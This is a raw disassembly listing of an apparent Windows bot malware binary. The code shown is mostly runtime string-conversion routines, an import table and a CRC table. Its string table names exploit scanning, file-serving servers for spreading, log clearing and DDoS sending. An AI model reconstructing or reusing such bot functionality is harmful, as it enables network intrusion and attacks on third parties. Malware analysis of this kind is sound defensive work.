; ---------------------------------------------------------------------------
loc_41F702: ; CODE XREF: sub_41F4EA+212�j
push [ebp+arg_14]
push [ebp+arg_10]
loc_41F708: ; CODE XREF: sub_41F4EA+216�j
push esi
push edi
push 1
push [ebp+arg_18]
call ds:dword_4200D4 ; MultiByteToWideChar
mov [ebp+var_1C], eax
jmp short loc_41F71D
; ---------------------------------------------------------------------------
loc_41F71A: ; CODE XREF: sub_41F4EA+160�j
; sub_41F4EA+181�j
mov edi, [ebp+var_34]
loc_41F71D: ; CODE XREF: sub_41F4EA+1C9�j
; sub_41F4EA+1E8�j ...
cmp [ebp+var_24], ebx
jz short loc_41F729
push edi
call sub_414844
pop ecx
loc_41F729: ; CODE XREF: sub_41F4EA+236�j
cmp [ebp+var_20], ebx
jz short loc_41F737
push [ebp+var_2C]
call sub_414844
pop ecx
loc_41F737: ; CODE XREF: sub_41F4EA+242�j
mov eax, [ebp+var_1C]
loc_41F73A: ; CODE XREF: sub_41F4EA+91�j
; sub_41F4EA+F5�j
lea esp, [ebp-40h]
call __SEH_epilog
retn
sub_41F4EA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41F743 proc near ; CODE XREF: sub_41F489+21�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = word ptr 0Ch
arg_8 = word ptr 10h
push ebp
mov ebp, esp
push ecx
cmp [ebp+arg_4], 0FFFFh
jz short loc_41F788
cmp [ebp+arg_4], 100h
jnb short loc_41F767
movzx eax, [ebp+arg_4]
mov ecx, off_42DEB4
mov ax, [ecx+eax*2]
jmp short loc_41F78F
; ---------------------------------------------------------------------------
loc_41F767: ; CODE XREF: sub_41F743+12�j
mov eax, [ebp+arg_0]
push dword ptr [eax+14h]
push dword ptr [eax+4]
lea eax, [ebp+var_4]
push eax
push 1
lea eax, [ebp+arg_4]
push eax
push 1
call sub_41F79A
add esp, 18h
test eax, eax
jnz short loc_41F78C
loc_41F788: ; CODE XREF: sub_41F743+A�j
xor eax, eax
jmp short loc_41F78F
; ---------------------------------------------------------------------------
loc_41F78C: ; CODE XREF: sub_41F743+43�j
mov eax, [ebp+var_4]
loc_41F78F: ; CODE XREF: sub_41F743+22�j
; sub_41F743+47�j
movzx ecx, [ebp+arg_8]
movzx eax, ax
and eax, ecx
leave
retn
sub_41F743 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41F79A proc near ; CODE XREF: sub_41F743+39�p
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push 24h
push offset stru_429D68
call __SEH_prolog
xor esi, esi
xor edi, edi
inc edi
cmp dword_47C628, esi
jnz short loc_41F7E5
lea eax, [ebp+var_1C]
push eax
push edi
push offset dword_429080
push edi
call ds:dword_420154 ; GetStringTypeW
test eax, eax
jz short loc_41F7D0
mov dword_47C628, edi
jmp short loc_41F7E5
; ---------------------------------------------------------------------------
loc_41F7D0: ; CODE XREF: sub_41F79A+2C�j
call ds:dword_420008 ; RtlGetLastWin32Error
cmp eax, 78h
jnz short loc_41F7E5
mov dword_47C628, 2
loc_41F7E5: ; CODE XREF: sub_41F79A+17�j
; sub_41F79A+34�j ...
mov eax, dword_47C628
cmp eax, edi
jnz short loc_41F805
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_420154 ; GetStringTypeW
jmp loc_41F9B6
; ---------------------------------------------------------------------------
loc_41F805: ; CODE XREF: sub_41F79A+52�j
cmp eax, 2
jz short loc_41F80E
cmp eax, esi
jnz short loc_41F861
loc_41F80E: ; CODE XREF: sub_41F79A+6E�j
mov [ebp+var_20], esi
mov [ebp+var_24], esi
cmp [ebp+arg_14], esi
jnz short loc_41F821
mov eax, dword_47C4E0
mov [ebp+arg_14], eax
loc_41F821: ; CODE XREF: sub_41F79A+7D�j
cmp [ebp+arg_10], esi
jnz short loc_41F82E
mov eax, dword_47C4F0
mov [ebp+arg_10], eax
loc_41F82E: ; CODE XREF: sub_41F79A+8A�j
push [ebp+arg_14]
call sub_41DD87
pop ecx
cmp [ebp+arg_10], eax
jz short loc_41F844
cmp eax, 0FFFFFFFFh
jz short loc_41F844
mov [ebp+arg_10], eax
loc_41F844: ; CODE XREF: sub_41F79A+A0�j
; sub_41F79A+A5�j
push esi
push esi
push esi
push esi
push [ebp+arg_8]
push [ebp+arg_4]
push esi
push [ebp+arg_10]
call ds:dword_4200D8 ; WideCharToMultiByte
mov ebx, eax
mov [ebp+var_28], ebx
cmp ebx, esi
jnz short loc_41F868
loc_41F861: ; CODE XREF: sub_41F79A+72�j
; sub_41F79A+126�j
xor eax, eax
jmp loc_41F9B6
; ---------------------------------------------------------------------------
loc_41F868: ; CODE XREF: sub_41F79A+C5�j
mov [ebp+ms_exc.disabled], esi
mov eax, ebx
add eax, 3
and eax, 0FFFFFFFCh
call sub_414630
mov [ebp+ms_exc.old_esp], esp
mov eax, esp
mov [ebp+var_2C], eax
push ebx
push esi
push eax
call sub_41C380
add esp, 0Ch
or [ebp+ms_exc.disabled], 0FFFFFFFFh
jmp short loc_41F8AD
; ---------------------------------------------------------------------------
loc_41F891: ; DATA XREF: .rdata:stru_429D68�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_41F895: ; DATA XREF: .rdata:stru_429D68�o
mov esp, [ebp+ms_exc.old_esp]
call sub_419B68
and [ebp+var_2C], 0
or [ebp+ms_exc.disabled], 0FFFFFFFFh
xor edi, edi
inc edi
mov ebx, [ebp+var_28]
xor esi, esi
loc_41F8AD: ; CODE XREF: sub_41F79A+F5�j
cmp [ebp+var_2C], esi
jnz short loc_41F8C5
push ebx
push edi
call sub_41C0B0
pop ecx
pop ecx
mov [ebp+var_2C], eax
cmp eax, esi
jz short loc_41F861
mov [ebp+var_20], edi
loc_41F8C5: ; CODE XREF: sub_41F79A+116�j
push esi
push esi
push ebx
push [ebp+var_2C]
push [ebp+arg_8]
push [ebp+arg_4]
push esi
push [ebp+arg_10]
call ds:dword_4200D8 ; WideCharToMultiByte
test eax, eax
jz loc_41F9A5
mov [ebp+ms_exc.disabled], edi
lea eax, [ebx+ebx+2]
add eax, 3
and eax, 0FFFFFFFCh
call sub_414630
mov [ebp+ms_exc.old_esp], esp
mov eax, esp
mov [ebp+var_30], eax
or [ebp+ms_exc.disabled], 0FFFFFFFFh
jmp short loc_41F91F
; ---------------------------------------------------------------------------
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+ms_exc.old_esp]
call sub_419B68
and [ebp+var_30], 0
or [ebp+ms_exc.disabled], 0FFFFFFFFh
xor edi, edi
inc edi
mov ebx, [ebp+var_28]
xor esi, esi
loc_41F91F: ; CODE XREF: sub_41F79A+167�j
cmp [ebp+var_30], esi
jnz short loc_41F939
lea eax, [ebx+ebx+2]
push eax
call sub_414CAD
pop ecx
mov [ebp+var_30], eax
cmp eax, esi
jz short loc_41F9A5
mov [ebp+var_24], edi
loc_41F939: ; CODE XREF: sub_41F79A+188�j
cmp [ebp+arg_14], esi
jnz short loc_41F946
mov eax, dword_47C4E0
mov [ebp+arg_14], eax
loc_41F946: ; CODE XREF: sub_41F79A+1A2�j
mov edi, [ebp+arg_8]
add edi, edi
mov eax, [ebp+var_30]
lea esi, [edi+eax]
or word ptr [esi], 0FFFFh
or word ptr [esi-2], 0FFFFh
push eax
push ebx
push [ebp+var_2C]
push [ebp+arg_0]
push [ebp+arg_14]
call ds:dword_4201D4 ; GetStringTypeA
mov [ebp+var_34], eax
cmp word ptr [esi-2], 0FFFFh
jz short loc_41F990
cmp word ptr [esi], 0FFFFh
jnz short loc_41F990
push edi
push [ebp+var_30]
push [ebp+arg_C]
call sub_41D050
add esp, 0Ch
jmp short loc_41F994
; ---------------------------------------------------------------------------
loc_41F990: ; CODE XREF: sub_41F79A+1DC�j
; sub_41F79A+1E3�j
and [ebp+var_34], 0
loc_41F994: ; CODE XREF: sub_41F79A+1F4�j
cmp [ebp+var_24], 0
jz short loc_41F9A3
push [ebp+var_30]
call sub_414844
pop ecx
loc_41F9A3: ; CODE XREF: sub_41F79A+1FE�j
xor esi, esi
loc_41F9A5: ; CODE XREF: sub_41F79A+143�j
; sub_41F79A+19A�j
cmp [ebp+var_20], esi
jz short loc_41F9B3
push [ebp+var_2C]
call sub_414844
pop ecx
loc_41F9B3: ; CODE XREF: sub_41F79A+20E�j
mov eax, [ebp+var_34]
loc_41F9B6: ; CODE XREF: sub_41F79A+66�j
; sub_41F79A+C9�j
lea esp, [ebp-40h]
call __SEH_epilog
retn
sub_41F79A endp
; ---------------------------------------------------------------------------
mov eax, dword_435C28
and eax, 0FFFFFFFEh
mov dword_435C28, eax
retn
; ---------------------------------------------------------------------------
loc_41F9CD: ; DATA XREF: sub_407028�o
mov eax, offset dword_429D98
jmp loc_4154C5
_text ends
; Section 2. (virtual address 00020000)
; Virtual size : 0000A888 ( 43144.)
; Section size in file : 0000A888 ( 43144.)
; Offset to raw data for section: 00020000
; Flags E0000020: Text Executable Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
_rdata segment para public 'CODE' use32
assume cs:_rdata
;org 420000h
assume es:nothing, ss:nothing, ds:_data, fs:nothing, gs:nothing
dword_420000 dd 77E61BE6h ; DATA XREF: sub_401141+1E0�r
; sub_401141+28B�r ...
dword_420004 dd 77E7751Ah ; DATA XREF: sub_401141+156�r
; sub_401967+32�r ...
dword_420008 dd 77F5157Dh ; DATA XREF: sub_401141+12E�r
; sub_401141+278�r ...
dword_42000C dd 77E7AC37h ; DATA XREF: sub_401141+10E�r
; sub_401141+25B�r ...
dword_420010 dd 77E7A099h ; DATA XREF: sub_401141+58�r
; sub_401141+183�r ...
dword_420014 dd 77E73C49h ; DATA XREF: sub_401967+22F�r
; sub_401B9D+24B�r ...
dword_420018 dd 77F7E300h ; DATA XREF: sub_401967+130�r
; sub_417E7A+28�r ...
dword_42001C dd 77F7E21Fh ; DATA XREF: sub_401967+C5�r
; sub_417E28+28�r ...
dword_420020 dd 77E7C706h ; DATA XREF: sub_401B9D+93�r
dword_420024 dd 77F53275h ; DATA XREF: sub_401B9D+87�r
; sub_401B9D+23B�r ...
dword_420028 dd 77E70F89h ; DATA XREF: sub_401EFF+D�r
dword_42002C dd 77E802FCh ; DATA XREF: sub_4021B5+17B�r
; sub_4021B5+1A7�r ...
dword_420030 dd 77E6D75Bh ; DATA XREF: sub_4021B5+171�r
; sub_4111E2+F8�r
dword_420034 dd 77E75CB5h ; DATA XREF: sub_4025CE+49B�r
; sub_402E5D+D9�r ...
dword_420038 dd 77E61BB8h ; DATA XREF: sub_4025CE+394�r
; sub_4025CE+485�r ...
dword_42003C dd 77E77963h ; DATA XREF: sub_4025CE+1EF�r
; sub_402E5D+B2�r ...
dword_420040 dd 77E79D8Ch ; DATA XREF: sub_4025CE+122�r
; sub_4069F7+AF�r ...
dword_420044 dd 77E7A837h ; DATA XREF: sub_4025CE+5D�r
; sub_40489A+26�r ...
dword_420048 dd 77E704FCh ; DATA XREF: sub_402E5D+6E�r
; sub_4089DC+4308�r ...
dword_42004C dd 77E78EAAh ; DATA XREF: sub_402F3D+C0�r
; sub_402F3D+144�r ...
dword_420050 dd 77E75E67h ; DATA XREF: sub_402F3D+B3�r
; sub_402F3D+139�r ...
dword_420054 dd 77E75D9Eh ; DATA XREF: sub_402F3D+26�r
; sub_4041A6+231�r
dword_420058 dd 77F51597h ; DATA XREF: sub_4031AF+41�r
; sub_4031AF+F5�r ...
dword_42005C dd 77F516F8h ; DATA XREF: sub_4031AF+21�r
; sub_403338+4A�r ...
dword_420060 dd 77E77CB7h ; DATA XREF: sub_4031AF+10�r
; sub_403338+40�r ...
dword_420064 dd 77E79424h ; DATA XREF: sub_403338+12D�r
; sub_4041A6+2AB�r
dword_420068 dd 77E794BFh ; DATA XREF: sub_403338+11B�r
; sub_4041A6+29D�r
dword_42006C dd 77E7F01Ah ; DATA XREF: sub_403338+88�r
; sub_4034D6+53�r
dword_420070 dd 77E61A54h ; DATA XREF: sub_403338+53�r
; sub_4034D6+8D�r
dword_420074 dd 77E7C3A5h ; DATA XREF: sub_403338+34�r
; sub_4034D6+2C�r ...
dword_420078 dd 77E706B7h ; DATA XREF: sub_403338+15�r
; sub_4034D6+10�r ...
dword_42007C dd 77E80618h ; DATA XREF: sub_40378E+16F�r
dword_420080 dd 77E78147h ; DATA XREF: sub_40378E+BB�r
dword_420084 dd 77E7A5FDh ; DATA XREF: sub_40378E+5F�r
; sub_405770+11�r ...
dword_420088 dd 77E805D8h ; DATA XREF: sub_40378E+59�r
; sub_405770+13A�r ...
dword_42008C dd 77E78B82h ; DATA XREF: sub_40489A+82�r
; sub_40F105+B9�r ...
dword_420090 dd 77E78C81h ; DATA XREF: sub_40489A+6C�r
; sub_41B178+2D�r ...
dword_420094 dd 77E793EFh ; DATA XREF: sub_40489A+39�r
; sub_404C2E+1F6�r
dword_420098 dd 77E64106h ; DATA XREF: sub_404AC0+9C�r
; sub_4116D2+185�r
dword_42009C dd 77E64006h ; DATA XREF: sub_404AC0+88�r
; sub_4116D2+16E�r
dword_4200A0 dd 77E74CABh ; DATA XREF: sub_404C2E+10C�r
; sub_4069F7+10A�r ...
dword_4200A4 dd 77E79F93h ; DATA XREF: sub_405770+2�r
; sub_4069F7+F6�r ...
dword_4200A8 dd 77E76A60h ; DATA XREF: sub_4067EA+2D�r
dword_4200AC dd 77E71B14h ; DATA XREF: sub_406874+26�r
dword_4200B0 dd 77E7166Fh ; DATA XREF: sub_406874+1D�r
dword_4200B4 dd 77E75090h ; DATA XREF: sub_4068AF+69�r
dword_4200B8 dd 77E74D76h ; DATA XREF: sub_4068AF+36�r
dword_4200BC dd 77E77797h ; DATA XREF: sub_4068AF+25�r
dword_4200C0 dd 77E7011Ah ; DATA XREF: sub_406931+96�r
dword_4200C4 dd 77E73CE2h ; DATA XREF: sub_406931+60�r
dword_4200C8 dd 77E668D9h ; DATA XREF: sub_4069F7+159�r
dword_4200CC dd 77E70396h ; DATA XREF: sub_4069F7+122�r
; sub_4081CA+293�r ...
dword_4200D0 dd 77E6AD34h ; DATA XREF: sub_4069F7+30�r
; sub_4089DC+2FC4�r
dword_4200D4 dd 77E77CCEh ; DATA XREF: sub_406FE7+F�r
; sub_413E26+84�r ...
dword_4200D8 dd 77E79924h ; DATA XREF: sub_407028+1A�r
; .text:00414219�r ...
dword_4200DC dd 77E65F4Ch ; DATA XREF: sub_4076B0+34�r
; .text:0040FA30�r
dword_4200E0 dd 77E79C90h ; DATA XREF: sub_40815F+C�r
; sub_40F292+7D�r ...
dword_4200E4 dd 77E73628h ; DATA XREF: sub_4081CA+2A0�r
; sub_4089DC+3914�r ...
dword_4200E8 dd 77E616B4h ; DATA XREF: sub_4081CA+10A�r
; sub_4081CA+24B�r ...
dword_4200EC dd 77E76A2Eh ; DATA XREF: sub_4081CA+D4�r
dword_4200F0 dd 77E75CEBh ; DATA XREF: sub_4089DC+3BE8�r
; sub_4108C1+A3�r ...
dword_4200F4 dd 77E71AFEh ; DATA XREF: sub_4089DC+2D79�r
dword_4200F8 dd 77E80656h ; DATA XREF: sub_40E6BB+25E�r
; sub_41DF9F+17�r
dword_4200FC dd 77E6BD13h ; DATA XREF: sub_40E6BB+1D4�r
; sub_413E26+AC�r
dword_420100 dd 77E79D5Bh ; DATA XREF: sub_40E6BB+6B�r
; sub_40E6BB+307�r
dword_420104 dd 77E7C2C4h ; DATA XREF: sub_40E6BB+64�r
dword_420108 dd 77E7FF65h ; DATA XREF: sub_40F105+59�r
dword_42010C dd 77EB7624h ; DATA XREF: sub_40F105+38�r
; sub_40F105+101�r
dword_420110 dd 77E79CE3h ; DATA XREF: sub_40F292+95�r
; sub_410547+6B�r
dword_420114 dd 77E7727Ah ; DATA XREF: sub_40F292+39�r
; sub_4107C5+48�r ...
dword_420118 dd 77E76968h ; DATA XREF: sub_40F6E5+5F�r
dword_42011C dd 77E7513Ch ; DATA XREF: .text:0040FA9D�r
; sub_41DD87+23�r
dword_420120 dd 77E7C657h ; DATA XREF: .text:0040FB0D�r
; sub_4115A4+19�r ...
dword_420124 dd 77E6C29Dh ; DATA XREF: sub_4101B8+1F1�r
dword_420128 dd 77EC7C51h ; DATA XREF: sub_4106B0+4D�r
dword_42012C dd 77E74C59h ; DATA XREF: sub_4108C1+CB�r
dword_420130 dd 77E76C1Ah ; DATA XREF: sub_4116D2+199�r
dword_420134 dd 77E70192h ; DATA XREF: sub_41E49E+E8�r
dword_420138 dd 77F522F2h ; DATA XREF: sub_41E20D+5A�r
dword_42013C dd 77E7176Ch ; DATA XREF: sub_41E1DD+8�r
dword_420140 dd 77E7339Ch ; DATA XREF: sub_41E1A5+C�r
dword_420144 dd 77E7C9E7h ; DATA XREF: sub_41E185+5�r
; sub_41E198+6�r
dword_420148 dd 77E79908h ; DATA XREF: .text:0041CFAC�r
dword_42014C dd 77E73FF9h ; DATA XREF: sub_41CD6E+57�r
dword_420150 dd 77E7FF2Eh ; DATA XREF: sub_41CA50:loc_41CAA3�r
; sub_41CACC:loc_41CB22�r
dword_420154 dd 77E7C866h ; DATA XREF: sub_41C3E0+24�r
; sub_41C3E0+128�r ...
dword_420158 dd 77F5722Fh ; DATA XREF: sub_4149EA+137�r
; sub_4149EA+188�r ...
dword_42015C dd 77E6167Bh ; DATA XREF: sub_415250+9�r
; sub_41DF9F+B�r
dword_420160 dd 77F6183Eh ; DATA XREF: sub_41F3D6�r
dword_420164 dd 77E6177Ah ; DATA XREF: .text:0041626F�r
; sub_41BB6D+5D�r
dword_420168 dd 77E7C938h ; DATA XREF: .text:loc_41621E�r
dword_42016C dd 77E72B29h ; DATA XREF: sub_416C27+10�r
dword_420170 dd 77F51587h ; DATA XREF: sub_416C45+66�r
; sub_41CFB8+79�r
dword_420174 dd 77E77CC4h ; DATA XREF: sub_416C45+4F�r
; sub_416CB6+55�r ...
dword_420178 dd 77E79B39h ; DATA XREF: sub_416C45+37�r
; sub_416CB6+3D�r
dword_42017C dd 77E78B61h ; DATA XREF: sub_416C45+10�r
dword_420180 dd 77E7C5B4h ; DATA XREF: sub_416CB6+9�r
dword_420184 dd 77E76E0Bh ; DATA XREF: sub_417F32+44�r
dword_420188 dd 77E7C726h ; DATA XREF: sub_417F32+11�r
dword_42018C dd 77E79E34h ; DATA XREF: sub_418159+22F�r
dword_420190 dd 77E7980Ah ; DATA XREF: sub_418471+7E�r
; sub_418528+52�r ...
dword_420194 dd 77E73196h ; DATA XREF: sub_41E1C1+C�r
dword_420198 dd 77E6169Ah ; DATA XREF: sub_419B68+C3�r
dword_42019C dd 77E7F044h ; DATA XREF: sub_419B68+1A�r
; sub_419B68+71�r
dword_4201A0 dd 77E77405h ; DATA XREF: sub_419C39+2C3�r
; sub_419C39+344�r ...
dword_4201A4 dd 77E781F9h ; DATA XREF: sub_419C39+27�r
; sub_419C39+15B�r ...
dword_4201A8 dd 77E7A13Fh ; DATA XREF: sub_41ADFD+4C�r
dword_4201AC dd 77E6C703h ; DATA XREF: sub_41ADFD+35�r
dword_4201B0 dd 77E7849Fh ; DATA XREF: sub_41AA66+1F�r
; sub_41AC67+3D�r ...
dword_4201B4 dd 77E79C3Dh ; DATA XREF: sub_41B3F9+154�r
; sub_41BB6D+188�r
dword_4201B8 dd 77EB9A84h ; DATA XREF: sub_41B5A9+159�r
dword_4201BC dd 77E9C5B1h ; DATA XREF: sub_41BA4B+113�r
dword_4201C0 dd 77E67702h ; DATA XREF: sub_41BA4B:loc_41BB22�r
dword_4201C4 dd 77E7C9E1h ; DATA XREF: sub_41BA4B+C1�r
dword_4201C8 dd 77E77EE1h ; DATA XREF: sub_41BA4B+B�r
dword_4201CC dd 77E7C931h ; DATA XREF: sub_41BB6D+1EE�r
dword_4201D0 dd 77E78406h ; DATA XREF: sub_41BB6D+107�r
; sub_41BB6D+196�r ...
dword_4201D4 dd 77E641EBh ; DATA XREF: sub_41C3E0+19C�r
; sub_41F79A+1CD�r
dd 0
dword_4201DC dd 71AB3F8Dh ; DATA XREF: sub_403BFF+88�r
dword_4201E0 dd 71AB155Ah ; DATA XREF: sub_403BFF+98�r
dword_4201E4 dd 71AB3ECEh ; DATA XREF: sub_403BFF+C1�r
dword_4201E8 dd 71AB5DE2h ; DATA XREF: sub_403BFF+D2�r
dword_4201EC dd 71AB1890h ; DATA XREF: sub_403BFF+10A�r
; sub_403BFF+58B�r
dword_4201F0 dd 71AB1B7Bh ; DATA XREF: sub_41F3D0�r
dword_4201F4 dd 71AB868Dh ; DATA XREF: sub_403BFF+170�r
dword_4201F8 dd 71AB5690h ; DATA XREF: sub_403BFF+1D3�r
dword_4201FC dd 71AB1AF4h ; DATA XREF: sub_403B6D+5F�r
; sub_403BFF+119�r
dword_420200 dd 71AB41DAh ; DATA XREF: sub_403AF0+15�r
; sub_403BFF+49�r
dword_420204 dd 71AB3C22h ; DATA XREF: sub_403AF0+21�r
; sub_403BFF+6F�r
dword_420208 dd 71AB12F8h ; DATA XREF: sub_403AF0+35�r
dword_42020C dd 71AB1746h ; DATA XREF: sub_403AF0+41�r
; sub_403BFF+B0�r
dword_420210 dd 71AB3E5Dh ; DATA XREF: sub_403AF0+57�r
dword_420214 dd 71AB1A6Dh ; DATA XREF: sub_403AF0+68�r
; sub_403B6D+80�r ...
dword_420218 dd 71AB1836h ; DATA XREF: sub_403AF0+6E�r
; sub_403B6D+86�r
align 10h
aTotalDInS_ db ' Total: %d in %s.',0 ; DATA XREF: sub_401000+81�o
align 4
aSD db ' %s: %d,',0 ; DATA XREF: sub_401000+42�o
align 10h
aScanExploitSta db '[SCAN]: Exploit Statistics:',0 ; DATA XREF: sub_401000+11�o
aScanScanNotAct db '[SCAN]: Scan not active.',0 ; DATA XREF: sub_4010CA+42�o
align 4
aScanCurrentIpS db '[SCAN]: Current IP: %s.',0 ; DATA XREF: sub_4010CA+2C�o
aHttpdFailedToS db '[HTTPD]: Failed to start server, error: <%d>.',0
; DATA XREF: sub_401141+38D�o
align 10h
aHttpdServerLis db '[HTTPD]: Server listening on IP: %s:%d, Directory: %s\.',0
; DATA XREF: sub_401141+337�o
; sub_4089DC+43AC�o
aFtpFailedToSta db '[FTP]: Failed to start server, error: <%d>.',0
; DATA XREF: sub_401141+27F�o
aFtpServerStart db '[FTP]: Server started on: %s:%d, File: %s, Request: %s.',0
; DATA XREF: sub_401141+228�o
aTftpFailedToSt db '[TFTP]: Failed to start server, error: <%d>.',0
; DATA XREF: sub_401141+13B�o
align 4
aTftpServerStar db '[TFTP]: Server started on Port: %d, File: %s, Request: %s.',0
; DATA XREF: sub_401141+DB�o
; sub_4089DC+421C�o
align 4
aD_D_D_D db '%d.%d.%d.%d',0 ; DATA XREF: sub_4017F1+42�o
; sub_407D15+3D�o
aScanIpSPortDIs db '[SCAN]: IP: %s, Port %d is open.',0 ; DATA XREF: sub_401967+DC�o
align 4
aScanIpSDScanTh db '[SCAN]: IP: %s:%d, Scan thread: %d, Sub-thread: %d.',0
; DATA XREF: sub_401967+84�o
aScanFinishedAt db '[SCAN]: Finished at %s:%d after %d minute(s) of scanning.',0
; DATA XREF: sub_401B9D+1E0�o
align 4
aScanFailedToSt db '[SCAN]: Failed to start worker thread, error: <%d>.',0
; DATA XREF: sub_401B9D+16E�o
aScanSDScanThre db '[SCAN]: %s:%d, Scan thread: %d, Sub-thread: %d.',0
; DATA XREF: sub_401B9D+10F�o
aScanFailedToIn db '[SCAN]: Failed to initialize critical section.',0
; DATA XREF: sub_401B9D+A0�o
align 4
aD_SS db '%d. %s = %s',0 ; DATA XREF: sub_401E87+35�o
aAliasList db '-[Alias List]-',0 ; DATA XREF: sub_401E87+10�o
align 4
a_2d_2d4d_2d_2d db '[%.2d-%.2d-%4d %.2d:%.2d:%.2d] %s',0 ; DATA XREF: sub_401EFF+60�o
align 4
aLogsCleared_ db '[LOGS]: Cleared.',0 ; DATA XREF: sub_401F9F+1A�o
align 10h
aLogListComplet db '[LOG]: List complete.',0 ; DATA XREF: sub_402011+DC�o
align 4
aLogBegin db '[LOG]: Begin',0 ; DATA XREF: sub_402011+3F�o
align 4
dd 0
dd 77073096h, 0EE0E612Ch, 990951BAh, 76DC419h, 706AF48Fh
dd 0E963A535h, 9E6495A3h, 0EDB8832h, 79DCB8A4h, 0E0D5E91Eh
dd 97D2D988h, 9B64C2Bh, 7EB17CBDh, 0E7B82D07h, 90BF1D91h
dd 1DB71064h, 6AB020F2h, 0F3B97148h, 84BE41DEh, 1ADAD47Dh
dd 6DDDE4EBh, 0F4D4B551h, 83D385C7h, 136C9856h, 646BA8C0h
dd 0FD62F97Ah, 8A65C9ECh, 14015C4Fh, 63066CD9h, 0FA0F3D63h
dd 8D080DF5h, 3B6E20C8h, 4C69105Eh, 0D56041E4h, 0A2677172h
dd 3C03E4D1h, 4B04D447h, 0D20D85FDh, 0A50AB56Bh, 35B5A8FAh
dd 42B2986Ch, 0DBBBC9D6h, 0ACBCF940h, 32D86CE3h, 45DF5C75h
dd 0DCD60DCFh, 0ABD13D59h, 26D930ACh, 51DE003Ah, 0C8D75180h
dd 0BFD06116h, 21B4F4B5h, 56B3C423h, 0CFBA9599h, 0B8BDA50Fh
dd 2802B89Eh, 5F058808h, 0C60CD9B2h, 0B10BE924h, 2F6F7C87h
dd 58684C11h, 0C1611DABh, 0B6662D3Dh, 76DC4190h, 1DB7106h
dd 98D220BCh, 0EFD5102Ah, 71B18589h, 6B6B51Fh, 9FBFE4A5h
dd 0E8B8D433h, 7807C9A2h, 0F00F934h, 9609A88Eh, 0E10E9818h
dd 7F6A0DBBh, 86D3D2Dh, 91646C97h, 0E6635C01h, 6B6B51F4h
dd 1C6C6162h, 856530D8h, 0F262004Eh, 6C0695EDh, 1B01A57Bh
dd 8208F4C1h, 0F50FC457h, 65B0D9C6h, 12B7E950h, 8BBEB8EAh
dd 0FCB9887Ch, 62DD1DDFh, 15DA2D49h, 8CD37CF3h, 0FBD44C65h
dd 4DB26158h, 3AB551CEh, 0A3BC0074h, 0D4BB30E2h, 4ADFA541h
dd 3DD895D7h, 0A4D1C46Dh, 0D3D6F4FBh, 4369E96Ah, 346ED9FCh
dd 0AD678846h, 0DA60B8D0h, 44042D73h, 33031DE5h, 0AA0A4C5Fh
dd 0DD0D7CC9h, 5005713Ch, 270241AAh, 0BE0B1010h, 0C90C2086h
dd 5768B525h, 206F85B3h, 0B966D409h, 0CE61E49Fh, 5EDEF90Eh
dd 29D9C998h, 0B0D09822h, 0C7D7A8B4h, 59B33D17h, 2EB40D81h
dd 0B7BD5C3Bh, 0C0BA6CADh, 0EDB88320h, 9ABFB3B6h, 3B6E20Ch
dd 74B1D29Ah, 0EAD54739h, 9DD277AFh, 4DB2615h, 73DC1683h
dd 0E3630B12h, 94643B84h, 0D6D6A3Eh, 7A6A5AA8h, 0E40ECF0Bh
dd 9309FF9Dh, 0A00AE27h, 7D079EB1h, 0F00F9344h, 8708A3D2h
dd 1E01F268h, 6906C2FEh, 0F762575Dh, 806567CBh, 196C3671h
dd 6E6B06E7h, 0FED41B76h, 89D32BE0h, 10DA7A5Ah, 67DD4ACCh
dd 0F9B9DF6Fh, 8EBEEFF9h, 17B7BE43h, 60B08ED5h, 0D6D6A3E8h
dd 0A1D1937Eh, 38D8C2C4h, 4FDFF252h, 0D1BB67F1h, 0A6BC5767h
dd 3FB506DDh, 48B2364Bh, 0D80D2BDAh, 0AF0A1B4Ch, 36034AF6h
dd 41047A60h, 0DF60EFC3h, 0A867DF55h, 316E8EEFh, 4669BE79h
dd 0CB61B38Ch, 0BC66831Ah, 256FD2A0h, 5268E236h, 0CC0C7795h
dd 0BB0B4703h, 220216B9h, 5505262Fh, 0C5BA3BBEh, 0B2BD0B28h
dd 2BB45A92h, 5CB36A04h, 0C2D7FFA7h, 0B5D0CF31h, 2CD99E8Bh
dd 5BDEAE1Dh, 9B64C2B0h, 0EC63F226h, 756AA39Ch, 26D930Ah
dd 9C0906A9h, 0EB0E363Fh, 72076785h, 5005713h, 95BF4A82h
dd 0E2B87A14h, 7BB12BAEh, 0CB61B38h, 92D28E9Bh, 0E5D5BE0Dh
dd 7CDCEFB7h, 0BDBDF21h, 86D3D2D4h, 0F1D4E242h, 68DDB3F8h
dd 1FDA836Eh, 81BE16CDh, 0F6B9265Bh, 6FB077E1h, 18B74777h
dd 88085AE6h, 0FF0F6A70h, 66063BCAh, 11010B5Ch, 8F659EFFh
dd 0F862AE69h, 616BFFD3h, 166CCF45h, 0A00AE278h, 0D70DD2EEh
dd 4E048354h, 3903B3C2h, 0A7672661h, 0D06016F7h, 4969474Dh
dd 3E6E77DBh, 0AED16A4Ah, 0D9D65ADCh, 40DF0B66h, 37D83BF0h
dd 0A9BCAE53h, 0DEBB9EC5h, 47B2CF7Fh, 30B5FFE9h, 0BDBDF21Ch
dd 0CABAC28Ah, 53B39330h, 24B4A3A6h, 0BAD03605h, 0CDD70693h
dd 54DE5729h, 23D967BFh, 0B3667A2Eh, 0C4614AB8h, 5D681B02h
dd 2A6F2B94h, 0B40BBE37h, 0C30C8EA1h, 5A05DF1Bh, 2D02EF8Dh
dword_420978 dd 6272h ; DATA XREF: sub_403B6D+24�o
; sub_411DD2+121�o
aDdosSendErrorD db '[DDoS]: Send error: <%d>.',0 ; DATA XREF: sub_4021B5+2B7�o
align 4
